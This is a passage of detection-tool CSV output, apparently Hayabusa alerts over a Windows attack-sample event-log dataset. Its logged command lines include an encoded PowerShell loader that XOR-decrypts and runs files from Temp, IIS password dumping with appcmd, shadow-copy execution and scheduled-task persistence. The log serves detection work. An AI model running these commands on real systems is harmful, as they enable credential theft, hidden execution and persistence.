BTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgAC
QAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 
+09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: 
C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", 
""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: 
C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: 